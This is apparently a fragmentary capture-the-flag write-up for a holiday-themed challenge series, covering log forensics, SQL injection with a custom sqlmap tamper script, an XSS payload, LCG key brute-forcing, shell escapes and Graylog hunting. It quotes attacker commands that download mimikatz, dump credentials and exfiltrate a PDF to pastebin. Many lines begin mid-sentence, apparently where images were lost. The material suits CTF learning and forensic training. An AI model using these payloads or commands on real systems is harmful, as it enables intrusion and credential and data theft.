supatree
There were 77 login attempts, but only 76 of them failed. That means the attacker got in.
docker-compose (on Mac). For that we need to clone https://github.com/activecm/rita and put the unzipped 'elfu-zeeklogs' into that folder.
rita/etc/rita.yaml -> uncomment a few things
rita/docker-compose.yaml -> add the paths
show-beacons helps find IPs that exhibit C2 behavior.
stoq: with the Splunk field results{}.workers.smtp.body we find something interesting.
results{}.archivers.filedir.path: if we look at the path /home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4 in the "File Archive" section of Splunk, we discover that this file contains the answer.
image classifier for our machine learning needs. We want the ml5 variable to live in the browser console, so we will load the script. build_images is overridden to call our capteha-breaking function.
spam() function that sent 100 contest entries.
Change the input type from email to text. Entering zz as an email to check, it redirects us to a weird looking url, https://studentportal.elfu.org/validator.php, to get a token before submission. Continue to experiment with the email field: entering ' union select * from lol # as elfmail displays an error that names the database, elfu. What if we try krampus? ' union select * from krampus # results in a different error, this time naming the database elfu, table krampus.
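The manual probe above (fetch a token from validator.php, then submit the elfmail value together with that token) is what any automated injection has to reproduce. What follows is an added example, not the write-up's own tamper script: a sqlmap-style tamper module that URL-encodes the injected elfmail value, fetches a fresh token from https://studentportal.elfu.org/validator.php and appends it as a separate form parameter, plus two small helpers for the MySQL hex-string literals (0x...) used to smuggle markup into a UNION payload without quote characters. The parameter name token, the assumption that validator.php returns the bare token as its response body, and the token_fetcher keyword used for offline testing are mine; sqlmap itself only calls tamper(payload, **kwargs).

```python
"""sqlmap-style tamper module for a form that demands a per-request token.

Added example, not the original write-up's script. Run sqlmap with
--skip-urlencode so the literal '&token=...' appended below reaches the
server as its own form parameter instead of being percent-encoded into the
elfmail value; that is also why this module has to URL-encode the payload
itself.
"""
import urllib.parse
import urllib.request

VALIDATOR_URL = "https://studentportal.elfu.org/validator.php"  # from the page
TOKEN_PARAM = "token"  # assumption: name of the form field carrying the token


def fetch_token(url=VALIDATOR_URL, timeout=10):
    """Default token fetcher: GET validator.php and return its body.

    Assumption: the body is the bare token, as the manual probe suggested.
    """
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace").strip()


def build_value(payload, token):
    """The exact string sqlmap should substitute for the injected value:
    encoded payload, then a second parameter carrying the encoded token."""
    return "%s&%s=%s" % (
        urllib.parse.quote_plus(payload),
        TOKEN_PARAM,
        urllib.parse.quote_plus(token),
    )


def to_hex_literal(text):
    """MySQL hex-string literal for text, usable inside a UNION SELECT
    where quote characters would break or be filtered."""
    return "0x" + text.encode("utf-8").hex()


def from_hex_literal(literal):
    """Inverse of to_hex_literal, for reading payloads back."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def dependencies():
    # sqlmap calls this hook when loading the module; nothing to check here.
    pass


def tamper(payload, **kwargs):
    """sqlmap entry point (sqlmap passes the payload and, e.g., headers).

    token_fetcher is an extra keyword used only for offline testing; sqlmap
    never passes it, so the real fetch_token() is used in a live run.
    """
    if payload is None:
        return payload
    fetcher = kwargs.get("token_fetcher", fetch_token)
    return build_value(payload, fetcher())


if __name__ == "__main__":
    # Offline demonstration with a constructed token; no request is made.
    print(tamper("' union select * from lol #", token_fetcher=lambda: "demo"))
    print(from_hex_literal(to_hex_literal("<img src=x onerror=confirm(/XSS/)>")))
```

Save it as a .py file and point sqlmap at it with --tamper=/path/to/file.py together with --skip-urlencode; every request then carries a token that was fetched moments before, which is the whole reason the plain form could not be fuzzed directly.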
d@efe.com' union select 0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e # gives us this (the hex literal decodes to <img src=x onerror=confirm(/XSS/)>).
&token= needs to be urlencoded, as well as the elfmail itself. We will need a custom tamper script.
lol (the tamper script), target database elfu, table krampus. URL encoding needs to be skipped because we encode things in a custom way in our tamper script. Also, from our previous experiments we know that Union-based and Error-based SQLi techniques work.
sub_401E60, sub_401D90 and sub_401DC0 (the last one inside the loop that iterates 8 times, key length confirmed!).
In sub_401E60 the Windows _time64 function is used. It returns the current system time as a timestamp in seconds. Looks like the seed of the "random" key generator is this timestamp. The result of _time64 is in the eax register, and the original caller then saves it on the stack as an argument for sub_401D90.
In sub_401D90 we print the timestamp and eventually save it to the dword_40602C memory location.
sub_401DC0 gets called inside the loop. It acts like a random number generator: it takes whatever is at dword_40602C, does some math to it, and puts the result back into dword_40602C. On the first iteration of the loop the result of _time64 is processed; on further iterations dword_40602C contains the result of the previous iteration. When sub_401DC0 returns, the lower byte of the result (al) is moved to the appropriate slot in the key array: [ebp+arg_0] is the address of the beginning of the array, [ebp+var_4] is the current offset (it gets incremented in the loop).
Searching for the constant used in sub_401DC0, 214013, leads us to Rosetta Code, Linear Congruential Generator, which gives us everything brute() needs.
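As an added example (not the write-up's brute(), which is not reproduced here), the key derivation described above and a seed search over a time window in Python. The multiplier 214013 comes from the page; the increment 2531011 and the (state >> 16) & 0x7fff output step are the Microsoft rand() parameters listed on the Rosetta Code Linear Congruential Generator page that the search led to, so they are assumptions about what sub_401DC0 does rather than something read off this page. The key_is_correct callback stands in for whatever brute() does with a candidate key; the page does not name the cipher, so the decrypt-and-check step is left to the caller.

```python
"""Rebuild the 8-byte key derived from _time64() and brute-force its seed.

Added example, not the write-up's code. Constants other than 214013 are the
Microsoft rand() LCG parameters from Rosetta Code (an assumption about
sub_401DC0).
"""

MS_LCG_MULT = 214013      # the constant found in sub_401DC0
MS_LCG_INC = 2531011      # assumption: Microsoft rand() increment
MASK32 = 0xFFFFFFFF       # dword_40602C is a 32-bit cell
KEY_LEN = 8               # the loop iterates 8 times


def lcg_step(state):
    """One call of sub_401DC0: advance the state kept in dword_40602C and
    return (new_state, output). The low byte of output is what lands in al."""
    state = (state * MS_LCG_MULT + MS_LCG_INC) & MASK32
    return state, (state >> 16) & 0x7FFF


def derive_key(seed, key_len=KEY_LEN):
    """Seed with the _time64() timestamp, then take the low byte of each
    successive generator output as the next key byte."""
    state = seed & MASK32
    key = bytearray()
    for _ in range(key_len):
        state, out = lcg_step(state)
        key.append(out & 0xFF)
    return bytes(key)


def brute_force_seed(key_is_correct, start, end):
    """Try every second in [start, end] (inclusive) as the seed and return
    (seed, key) for the first key that key_is_correct() accepts, else None.

    In a real run key_is_correct would decrypt the first block with the
    candidate key and look for a plausible document header; that step
    depends on the cipher, which this page does not name.
    """
    for seed in range(start, end + 1):
        key = derive_key(seed)
        if key_is_correct(key):
            return seed, key
    return None


if __name__ == "__main__":
    # Demonstration with a constructed seed: hide a key, then recover its seed
    # by scanning a window of a few hours around it.
    hidden_seed = 1575600000
    hidden_key = derive_key(hidden_seed)
    found = brute_force_seed(lambda k: k == hidden_key,
                             hidden_seed - 3600 * 2, hidden_seed + 3600 * 2)
    print("key %s recovered from seed %d" % (hidden_key.hex(), found[0]))
```

The search is cheap because the effective key space is the number of seconds in the window during which the file could have been encrypted, not 2^64; narrowing that window is what turns a hopeless brute force into a few minutes of work.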
brute() takes 3 minutes to execute. Here is the first page of the decrypted document!
https://sleighworkshopdoor.elfu.org/. I was using the Chromium-based Brave browser. Command + Option + i opens Dev Tools on Mac.
File -> Print
head to expand it
head -> look at the style tag
Command + F in the Elements tab of Dev Tools. We look for 'eggs' and then click the Event Listeners tab at the bottom.
css -> styles.css, and Command + F to look for 'active'.
macaroni, swab, and gnome inside lock10. And drag the cover div down.
srf.elfu.org
/etc/passwd, let's check that in the logs.
q
cat the file Kent mentioned and we see the firewall config requirements.
lol.sh with all the requirements in the right order.
['1373', '1733', '3137', '3371', '7331']. Code 7331 worked!
home folder. Let's see what's wrong with ls and which binary is used.
ls binary. $PATH lists /usr/local/bin first, so anything placed there shadows the real binary in other locations. No worries, we will explicitly call ls from the bin folder.
/etc/passwd
/bin/nsh. And we can use chattr to change the nyanshell's attributes. Let's see what attributes it has first (lsattr).
/bin/nsh is immutable. We can change that, and then overwrite nsh with the contents of the bash binary.
ps command to figure out which port the database is running on. Let's use the -a flag to see processes of all users and the -x flag to also see processes not attached to a terminal.
elfu database sounds like it is university related, so the professor might have put the solution here.
https://trail.elfu.org, which can be discovered in the Network tab of the browser Dev Tools when the terminal opens. Like Chris suggested in the video, let's look at the page source and see if we can find anything.
#statusContainer
270660. Then we get the MD5 hash of 270660, which is 89a8ba25755f8733d773e708ad16020a, and add that value in the appropriate place.
https://graylog.elfu.org/ and fill out the report at https://report.elfu.org/. To find these URLs we look at the GET requests in the Network tab of Dev Tools upon opening the terminal.
EventID:2 AND TargetFilename:/.*cookie.*/ AND ProcessImage:/.*firefox.*/
ProcessImage:/.*cookie_recipe\.exe/ AND EventID:3
EventID:1 AND ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*\/c.*/
C:\Windows\system32\cmd.exe /c "whoami " will be on top.
ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*service.*/
/.*mimikatz.*/
C:\Windows\system32\cmd.exe /c "Invoke-WebRequest -Uri http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe " and then ran it: C:\cookie.exe" privilege::debug sekurlsa::logonpasswords exit
EventID:4624 AND SourceNetworkAddress:192.168.247.175
EventID:4624 AND LogonType:10
SourceHostName:ELFU-RES-WKS2 AND _exists_:LogonType AND _exists_:DestinationHostname
ELFU-RES-WKS2. We also know that any file system navigation happened after 2019-11-19 06:04:28, so we set the time selector to "from" 2019-11-19 06:04:29 "to" 2019-11-19 06:24:00 and search for all logs that have any DestinationHostname and LogonType. The query returns 4 results. All of them have LogonType 3 and DestinationHostname elfu-res-wks3.
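To make the logic of these queries concrete, here is an added example (not the write-up's or Graylog's code): a small evaluator for the subset of Graylog search syntax used on this page, run over a few constructed Sysmon/Security events that carry the same field names. Two things it makes explicit: Graylog regex terms must match the whole field value, which is why every pattern above is wrapped in .* on both sides, and the lateral-movement step is really a time-window filter over events that carry both LogonType and DestinationHostname. The event contents (paths under C:\Users\user, the elfu-res-wks1 hop, every timestamp) are made up; only the field names and the queries come from the page.

```python
"""Evaluate this page's Graylog-style queries over constructed events.

Added example, not the author's code. Supported syntax is only what the page
uses: 'Field:value' (exact), 'Field:/regex/' (regex anchored to the whole
value, as in Graylog), '_exists_:Field', a bare '/regex/' tried against every
field, and 'AND'.
"""
import re

# Constructed sample events, roughly in the order the page's story unfolds.
EVENTS = [
    {"timestamp": "2019-11-19 05:58:03", "EventID": 2,
     "ProcessImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\user\Downloads\cookie_recipe.exe"},
    {"timestamp": "2019-11-19 05:58:40", "EventID": 3,
     "ProcessImage": r"C:\Users\user\Downloads\cookie_recipe.exe",
     "DestinationIp": "192.168.247.175", "DestinationPort": 4444},
    {"timestamp": "2019-11-19 05:59:01", "EventID": 1,
     "ParentProcessImage": r"C:\Users\user\Downloads\cookie_recipe.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "whoami "'},
    {"timestamp": "2019-11-19 06:01:15", "EventID": 1,
     "ParentProcessImage": r"C:\Users\user\Downloads\cookie_recipe.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "Invoke-WebRequest -Uri '
                    r'http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe "'},
    {"timestamp": "2019-11-19 06:02:10", "EventID": 4624, "LogonType": 3,
     "SourceHostName": "ELFU-RES-WKS2",
     "DestinationHostname": "elfu-res-wks1"},      # before the window: noise
    {"timestamp": "2019-11-19 06:03:50", "EventID": 4624, "LogonType": 10,
     "SourceNetworkAddress": "192.168.247.175"},  # interactive RDP logon
    {"timestamp": "2019-11-19 06:07:22", "EventID": 4624, "LogonType": 3,
     "SourceHostName": "ELFU-RES-WKS2",
     "DestinationHostname": "elfu-res-wks3"},      # the lateral hop
]


def _term_matches(term, event):
    """Evaluate one query term against one event."""
    term = term.strip()
    if term.startswith("/") and term.endswith("/"):
        # Bare regex, no field: try it against every field value.
        rx = re.compile(term[1:-1])
        return any(rx.fullmatch(str(v)) for v in event.values())
    name, _, value = term.partition(":")
    name, value = name.strip(), value.strip()
    if name == "_exists_":
        return value in event
    if name not in event:
        return False
    actual = str(event[name])
    if value.startswith("/") and value.endswith("/"):
        # Graylog regex terms are anchored: the pattern must cover the
        # whole value, hence the '.*' on both sides of every page query.
        return re.fullmatch(value[1:-1], actual) is not None
    return actual == value


def search(query, events=None, start=None, end=None):
    """Return events matching every AND-ed term, restricted to the optional
    [start, end] timestamp window (ISO strings compare lexicographically),
    oldest first."""
    events = EVENTS if events is None else events
    terms = [t for t in query.split(" AND ") if t.strip()]
    hits = []
    for ev in events:
        ts = ev["timestamp"]
        if start is not None and ts < start:
            continue
        if end is not None and ts > end:
            continue
        if all(_term_matches(t, ev) for t in terms):
            hits.append(ev)
    return sorted(hits, key=lambda e: e["timestamp"])


if __name__ == "__main__":
    for hit in search(r"EventID:1 AND ParentProcessImage:/.*cookie_recipe\.exe/"
                      r" AND CommandLine:/.*\/c.*/"):
        print(hit["timestamp"], hit["CommandLine"])
    for hit in search("SourceHostName:ELFU-RES-WKS2 AND _exists_:LogonType"
                      " AND _exists_:DestinationHostname",
                      start="2019-11-19 06:04:29", end="2019-11-19 06:24:00"):
        print(hit["timestamp"], hit["DestinationHostname"])
```

The same evaluator shows why a regex term without the leading .* returns nothing: /cookie.*/ would have to match from the first character of the full path, not from somewhere inside it.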
EventID:2 AND TargetFilename:/.*research.*/
CommandLine:/.*POST.*/
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri https://pastebin.com/post.php -Method POST -Body @{ "submit_hidden" = "submit_hidden"; "paste_code" = $([Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf"))); "paste_format" = "1"; "paste_expire_date" = "N"; "paste_private" = "0"; "paste_name"="cookie recipe" }
Very soon after that the POST request will be executed, so we click on "show surrounding messages" -> 5 seconds. Only one new entry will show up. It has EventID 3, Network Connection, and DestinationHostname "pastebin"; its DestinationIp is the answer.
The riddles give us hints about which PowerShell commands to use.
The angle value we look for! Also, let's have a closer look at entry number 9.
The riddle gives us detailed instructions on what to do next.
Refraction is found!
temperature
./shall/see leads to another riddle.
grep, you are being missed.
conn.log sorted by duration.